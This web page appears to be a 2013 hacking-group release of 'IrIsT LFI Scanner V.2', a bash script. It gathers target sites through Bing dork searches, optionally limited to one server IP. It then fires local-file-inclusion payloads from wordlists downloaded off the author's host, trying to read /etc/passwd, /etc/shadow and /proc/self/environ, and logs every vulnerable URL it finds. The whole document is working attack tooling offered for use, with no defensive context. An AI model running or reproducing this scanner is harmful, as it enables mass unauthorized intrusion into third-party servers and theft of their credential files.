facebook facebook twitter rss

IrIsT LFI Scanner V.2

Author: Beni_Vanda , Published: 21-02-2013
#!/bin/sh
# "*****************************************************************"
# "* In The Name Of ALLAH *"
# "* IrIsT LFI Scanner V.2 *"
# "* www.IrIsT.Ir *"
# "* Coded By : Beni_Vanda *"
# "* Gr33tz : All Turkish/Iranian/Kurdish Hackerz *"
# "* Beni_Vanda@yahoo.com *"
# "*****************************************************************"

page=0
last_page_check=
how_many=1
single_page=

function Searching_Lfi_On_Bing()
{
echo -e "\e[1;31mPlz input URL Drok \e[0m: ";
read DORK_SERVER

echo -e "\e[1;35mSearching With Bing Bot Plz W8 \e[0m: ";

while [ -z "$last_page_check" ] && [ -n "$how_many" ] && [ -z "$single_page" ]; do

url="http://www.bing.com/search?q=%27$DORK_SERVER%27&qs=n&pq=%27$DORK_SERVER%27&sc=0-0&sp=-1&sk=&first=${page}0&FORM=PERE"

wget -q -O domain_bing.php "$url"

last_page_check=`egrep -o '<span class="sb_count" id="count">[0-9]+-([0-9]+) of (\1)' domain_bing.php`

how_many=`egrep -o '<span class="sb_count" id="count">[^<]+' domain_bing.php | cut -d '>' -f 2|cut -d ' ' -f 1-3`

single_page=`egrep -o '<span class="sb_count" id="count">[0-9] results' domain_bing.php `

cat "domain_bing.php" | egrep -o "<h3><a href=\"[^\"]+" domain_bing.php | cut -d '"' -f 2 >> alldomain_bing_bing.txt
rm -f domain_bing.php;
let page=$page+1;
done

if [ `ls -l alldomain_bing_bing.txt | awk '{print $5}'` -eq 0 ]
then
echo -e "\e[1;31mNot Found $DORK_SERVER on Bing :| ...\e[0m"
echo -e "\e[1;31mExited !! ...\e[0m"
exit 1;
fi

cat alldomain_bing_bing.txt | awk '{gsub("http://","")}1' | awk '{gsub("https://","")}1' | sed '/www./s///g' | tr '[:upper:]' '[:lower:]' | sort | uniq >> domains_bing.txt
rm -f alldomain_bing_bing.txt;

dork=`echo "$DORK_SERVER" | cut -d '?' -f 1`

for line_test in `cat domains_bing.txt`
do
varfor=`echo "$line_test" | egrep "$dork"`

if [ -z $varfor ]
then
echo "$line_test" >>should_delete_bing.txt
else
echo "$line_test" | sort | uniq >>should_test_bing.txt
fi
done

touch domain_sorted_bing.txt;

for namedomain in `cat should_test_bing.txt`
do
domaincut=`echo "$namedomain" | cut -d '/' -f 1`
urlgreap=`cat domain_sorted_bing.txt | egrep $domaincut`
if [[ $urlgreap = "" ]]
then
echo "$namedomain" >>domain_sorted_bing.txt
fi
done

for line_sorted_bing in `cat domain_sorted_bing.txt`
do
###################### check passwd Keyword #######################
echo -e "\e[1;36mnow searching with /etc/passwd keyword on $line_sorted_bing ...\e[0m"

for url_passwd in `cat passwd.txt`
do
str=`curl --silent $line_sorted_bing$url_passwd | awk '/root:x:0:/ { print }'`
if [[ $str = "" ]]
then
echo -e "\e[1;34m[*] Trying ... >> Not Found \e[0m"
else
echo -e "\e[1;32m[*] Trying ... >> Found >> $line_sorted_bing$url_passwd\e[0m"
echo $line_sorted_bing$url_passwd >>Vulnerability_list.txt
break
fi
done
###################### check passwd Keyword #######################

###################### check shadow Keyword #######################
echo -e "\e[1;36mnow searching with /etc/shadow keyword on $line_sorted_bing ...\e[0m"

for url_shadow in `cat shadow.txt`
do
str=`curl --silent $line_sorted_bing$url_shadow | awk '/root:/ { print }'`
if [[ $str = "" ]]
then
echo -e "\e[1;34m[*] Trying ... >> Not Found \e[0m"
else
echo -e "\e[1;32m[*] Trying ... >> Found >> $line_sorted$url_shadow\e[0m"
echo $line_sorted_bing$url_shadow >>Vulnerability_list.txt
break
fi
done
###################### check passwd Keyword #######################

###################### check proc Keyword #######################
echo -e "\e[1;36mnow searching with /proc/self/environ keyword on $line_sorted_bing ...\e[0m"

for url_proc in `cat proc.txt`
do
str=`curl --silent $line_sorted_bing$url_proc | awk '/DOCUMENT_ROOT=/ { print }'`
str2=`curl --silent $line_sorted_bing$url_proc | awk '/TERM=xterm/ { print }'`

if [[ $str = "" ]] && [[ $str2 = "" ]]
then
echo -e "\e[1;34m[*] Trying ... >> Not Found \e[0m"
else
echo -e "\e[1;32m[*] Trying ... >> Found >> $line_sorted_bing$url_proc\e[0m"
echo $line_sorted_bing$url_proc >>Vulnerability_list.txt
break
fi

done
###################### check proc Keyword #######################
done

}


function Searching_Lfi_On_Server()
{
echo -e "\e[1;31mPlz input Server IP Or Domain \e[0m: ";
read IP_SERVER
echo -e "\e[1;31mPlz input URL Drok \e[0m: ";
read DORK_SERVER

if [ `echo "$IP_SERVER" | egrep "(([0-9]+\.){3}[0-9]+)|\[[a-f0-9:]+\]"` ]; then
IP="$IP_SERVER"
else
IP=`resolveip -s "$IP_SERVER"`
if [ "$?" != 0 ]; then
echo "Error: cannot resolve $IP_SERVER to an IP"
exit
fi
fi


# Check Sever Status
ping -c 3 $IP
if [ $? -ne 0 ]
then
echo "Server $IP is down :| >> Program Exit "
exit 1
fi

echo -e "\e[1;35mSearching With Bing Bot Plz W8 \e[0m: ";

while [ -z "$last_page_check" ] && [ -n "$how_many" ] && [ -z "$single_page" ]; do

url="http://www.bing.com/search?q=ip%3a$IP+%27$DORK_SERVER%27&qs=n&pq=ip%3a$IP+%27$DORK_SERVER%27&sc=8-26&sp=-1&sk=&first=${page}1&FORM=PERE"

wget -q -O domain_bing.php "$url"

last_page_check=`egrep -o '<span class="sb_count" id="count">[0-9]+-([0-9]+) of (\1)' domain_bing.php`

how_many=`egrep -o '<span class="sb_count" id="count">[^<]+' domain_bing.php | cut -d '>' -f 2|cut -d ' ' -f 1-3`

single_page=`egrep -o '<span class="sb_count" id="count">[0-9] results' domain_bing.php `

cat "domain_bing.php" | egrep -o "<h3><a href=\"[^\"]+" domain_bing.php | cut -d '"' -f 2 >> alldomain_bing.txt
rm -f domain_bing.php;
let page=$page+1;
done

if [ `ls -l alldomain_bing.txt | awk '{print $5}'` -eq 0 ]
then
echo -e "\e[1;31mNot Found $DORK_SERVER on $IP_SERVER ...\e[0m"
echo -e "\e[1;31mExited !! ...\e[0m"

exit 1;
fi

cat alldomain_bing.txt | awk '{gsub("http://","")}1' | awk '{gsub("https://","")}1' | sed '/www./s///g' | tr '[:upper:]' '[:lower:]' | sort | uniq >> domains.txt
rm -f alldomain_bing.txt;

dork=`echo "$DORK_SERVER" | cut -d '?' -f 1`

for line_test in `cat domains.txt`
do
varfor=`echo "$line_test" | egrep "$dork"`

if [ -z $varfor ]
then
echo "$line_test" >>should_delete.txt
else
echo "$line_test" | sort | uniq >>should_test.txt
fi
done

touch domain_sorted.txt;

for namedomain in `cat should_test.txt`
do
domaincut=`echo "$namedomain" | cut -d '/' -f 1`
urlgreap=`cat domain_sorted.txt | egrep $domaincut`
if [[ $urlgreap = "" ]]
then
echo "$namedomain" >>domain_sorted.txt
fi
done

for line_sorted in `cat domain_sorted.txt`
do
###################### check passwd Keyword #######################
echo -e "\e[1;36mnow searching with /etc/passwd keyword on $line_sorted ...\e[0m"

for url_passwd in `cat passwd.txt`
do
str=`curl --silent $line_sorted$url_passwd | awk '/root:x:0:/ { print }'`
if [[ $str = "" ]]
then
echo -e "\e[1;34m[*] Trying ... >> Not Found \e[0m"
else
echo -e "\e[1;32m[*] Trying ... >> Found >> $line_sorted$url_passwd\e[0m"
echo $line_sorted$url_passwd >>Vulnerability_list.txt
break
fi
done
###################### check passwd Keyword #######################

###################### check shadow Keyword #######################
echo -e "\e[1;36mnow searching with /etc/shadow keyword on $line_sorted ...\e[0m"

for url_shadow in `cat shadow.txt`
do
str=`curl --silent $line_sorted$url_shadow | awk '/root:/ { print }'`
if [[ $str = "" ]]
then
echo -e "\e[1;34m[*] Trying ... >> Not Found \e[0m"
else
echo -e "\e[1;32m[*] Trying ... >> Found >> $line_sorted$url_shadow\e[0m"
echo $line_sorted$url_shadow >>Vulnerability_list.txt
break
fi
done
###################### check passwd Keyword #######################

###################### check proc Keyword #######################
echo -e "\e[1;36mnow searching with /proc/self/environ keyword on $line_sorted ...\e[0m"

for url_proc in `cat proc.txt`
do
str=`curl --silent $line_sorted$url_proc | awk '/DOCUMENT_ROOT=/ { print }'`
str2=`curl --silent $line_sorted$url_proc | awk '/TERM=xterm/ { print }'`

if [[ $str = "" ]] && [[ $str2 = "" ]]
then
echo -e "\e[1;34m[*] Trying ... >> Not Found \e[0m"
else
echo -e "\e[1;32m[*] Trying ... >> Found >> $line_sorted$url_proc\e[0m"
echo $line_sorted$url_proc >>Vulnerability_list.txt
break
fi

done
###################### check proc Keyword #######################
done

}


function Searching_Lfi_On_Url()
{
echo -e "\e[1;31mPlz input URL link \e[0m: ";
read URL_Domain

echo "Vulnerability URL's will be Store at Vulnerability_list.txt ..."
echo "starting ..."

###################### check passwd Keyword #######################
echo -e "\e[1;36mnow searching with /etc/passwd keyword....\e[0m"

for url_passwd in `cat passwd.txt`
do
str=`curl --silent $URL_Domain$url_passwd | awk '/root:x:0:/ { print }'`
if [[ $str = "" ]]
then
echo -e "\e[1;34m[*] Trying ... >> Not Found \e[0m"
else
echo -e "\e[1;32m[*] Trying ... >> Found >> $URL_Domain$url_passwd\e[0m"
echo $URL_Domain$url_passwd >>Vulnerability_list.txt
break
fi
done
###################### check passwd Keyword #######################

###################### check shadow Keyword #######################
echo -e "\e[1;36mnow searching with /etc/shadow keyword ....\e[0m"

for url_shadow in `cat shadow.txt`
do
str=`curl --silent $URL_Domain$url_shadow | awk '/root:/ { print }'`
if [[ $str = "" ]]
then
echo -e "\e[1;34m[*] Trying ... >> Not Found \e[0m"
else
echo -e "\e[1;32m[*] Trying ... >> Found >> $URL_Domain$url_shadow\e[0m"
echo $URL_Domain$url_shadow >>Vulnerability_list.txt
break
fi
done
###################### check passwd Keyword #######################

###################### check proc Keyword #######################
echo -e "\e[1;36mnow searching with /proc/self/environ keyword....\e[0m"

for url_proc in `cat proc.txt`
do
str=`curl --silent $URL_Domain$url_proc | awk '/DOCUMENT_ROOT=/ { print }'`
str2=`curl --silent $URL_Domain$url_proc | awk '/TERM=xterm/ { print }'`

if [[ $str = "" ]] && [[ $str2 = "" ]]
then
echo -e "\e[1;34m[*] Trying ... >> Not Found \e[0m"
else
echo -e "\e[1;32m[*] Trying ... >> Found >> $URL_Domain$url_proc\e[0m"
echo $URL_Domain$url_proc >>Vulnerability_list.txt
break
fi

done
###################### check proc Keyword #######################
}


function main()
{
echo -e "\e[1;35mdownloading required file plz w8...\e[0m"
if [[ ! -d IrIsLFI ]]; then
mkdir IrIsTLFI;
fi

cd IrIsTLFI;
if [ ! -f shadow.txt ]; then
wget -o download_shadow.log http://benivanda.persiangig.com/tools/lfi-scanner/shadow.txt
fi

if [ ! -f security.txt ]; then
wget -o download_security.log http://benivanda.persiangig.com/tools/lfi-scanner/security.txt
fi

if [ ! -f proc.txt ]; then
wget -o download_proc.log http://benivanda.persiangig.com/tools/lfi-scanner/proc.txt
fi

if [ ! -f passwd.txt ]; then
wget -o download_passwd.log http://benivanda.persiangig.com/tools/lfi-scanner/passwd.txt
fi

if [ ! -f group.txt ]; then
wget -o download_group.log http://benivanda.persiangig.com/tools/lfi-scanner/group.txt
fi

echo -e "\e[1;33m1) Searching LFI Bug on Serevr with Dork <ip> <dork> \e[0m"
echo -e "\e[1;33m2) Searching LFI bug With Dork <dork> \e[0m"
echo -e "\e[1;33m3) Searching LFI bug on URL \e[0m"
echo -e "\e[1;33m4) Exit \e[0m"

echo -e "\e[1;31mPlease select one of the following \e[0m: ";
read option;

case $option in
1)
Searching_Lfi_On_Server;;
2)
Searching_Lfi_On_Bing;;
3)
Searching_Lfi_On_Url;;
4)
exit 0;;
*)
echo "Wrong Parametr ; Plz try again ...";
exit 1;;
esac

rm -f alldomain_bing_bing.txt;
rm -f domains_bing.txt
rm -f should_test_bing.txt
rm -f should_test.txt
rm -f should_delete_bing.txt
rm -f should_delete.txt
rm -f domains.txt
rm -f domain_sorted.txt

}

main;

Like us on Facebook :